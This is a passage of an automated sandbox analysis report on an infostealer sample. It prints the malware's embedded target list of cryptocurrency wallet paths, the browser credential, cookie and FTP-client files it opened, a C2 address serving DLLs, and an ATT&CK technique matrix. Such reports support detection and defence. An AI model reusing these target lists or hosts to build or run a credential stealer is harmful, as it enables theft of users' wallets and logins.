Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: \\config\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Binance\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                    Source: Yara match, File source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match, File source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, type: SAMPLE
                    Source: Yara match, File source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.5a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Code function: 0_2_6D01A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6D01A0C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CD10C40 sqlite3_bind_zeroblob,1_2_6CD10C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CD10D60 sqlite3_bind_parameter_name,1_2_6CD10D60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CC38EA0 sqlite3_clear_bindings,1_2_6CC38EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CD10B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6CD10B40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CC36410 bind,WSAGetLastError,1_2_6CC36410
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CC360B0 listen,WSAGetLastError,1_2_6CC360B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CC3C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,1_2_6CC3C050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CC36070 PR_Listen,1_2_6CC36070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 1_2_6CC3C030 sqlite3_bind_parameter_count,1_2_6CC3C030
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 411 Process Injection | 11 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 151 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Virtualization/Sandbox Evasion | DCSync | 3 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 411 Process Injection | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph. ID: 1447066; Sample: SecuriteInfo.com.Win32.Malw...; Startdate: 24/05/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.Malware-gen.198.6512.exe | 34% | ReversingLabs | Win32.Trojan.Casdet |
SecuriteInfo.com.Win32.Malware-gen.198.6512.exe | 38% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\ProgramData\AFCBAEBAEBFH\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\AFCBAEBAEBFH\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\AFCBAEBAEBFH\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\AFCBAEBAEBFH\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\AFCBAEBAEBFH\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\AFCBAEBAEBFH\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll | 0% | ReversingLabs | |

No Antivirus matches

Source | Detection | Scanner | Label | Link
steamcommunity.com | 0% | Virustotal | | Browse
fp2e7a.wpc.phicdn.net | 0% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.199.218.33 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://78.47.123.174/nss3.dll | false | Avira URL Cloud: safe | unknown
https://78.47.123.174/mozglue.dll | false | Avira URL Cloud: safe | unknown
https://78.47.123.174/freebl3.dll | false | Avira URL Cloud: safe | unknown
https://78.47.123.174/msvcp140.dll | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/76561199689717899 | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://78.47.123.174/ | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://78.47.123.174/sqls.dll | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://78.47.123.174/softokn3.dll | false | Avira URL Cloud: safe | unknown
https://78.47.123.174/vcruntime140.dll | false | Avira URL Cloud: safe | unknown
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ecosia.org/newtab/AFBFHD.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://78.47.123.174EGDGMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCBGCAF.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesFIIDBK.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/about/76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFCBGCAF.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    http://ocsp.sectigo.com0SecuriteInfo.com.Win32.Malware-gen.198.6512.exefalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/headeMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://help.steampowered.com/en/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/market/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/news/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englisMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://78.47.123.174/nss3.dll%MSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AFBFHD.1.drfalse
                    • URL Reputation: safe
                    unknown
                    http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp, FIIDBK.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://78.47.123.174JEGIMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://78.47.123.174/vcruntime140.dllRMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
